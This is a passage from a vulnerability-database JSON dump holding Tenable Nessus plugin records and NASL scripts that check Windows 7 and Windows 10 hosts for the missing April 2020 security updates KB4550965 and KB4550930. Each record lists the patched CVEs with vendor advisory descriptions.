\"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550964\");\n script_xref(name:\"MSKB\", value:\"4550965\");\n script_xref(name:\"MSFT\", value:\"MS20-4550964\");\n script_xref(name:\"MSFT\", value:\"MS20-4550965\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550965\nor cumulative update 4550964. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550964/windows-7-update-kb4550964\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c90e16d\");\n # https://support.microsoft.com/en-us/help/4550965/windows-7-update-kb4550965\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d52628ac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550965 or Cumulative Update KB4550964.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550964', '4550965');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550964, 4550965])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:11:07", "description": "The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550930: Windows 10 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0784", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550930.NASL", "href": "https://www.tenable.com/plugins/nessus/135469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135469);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550930\");\n script_xref(name:\"MSFT\", value:\"MS20-4550930\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550930: Windows 10 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the 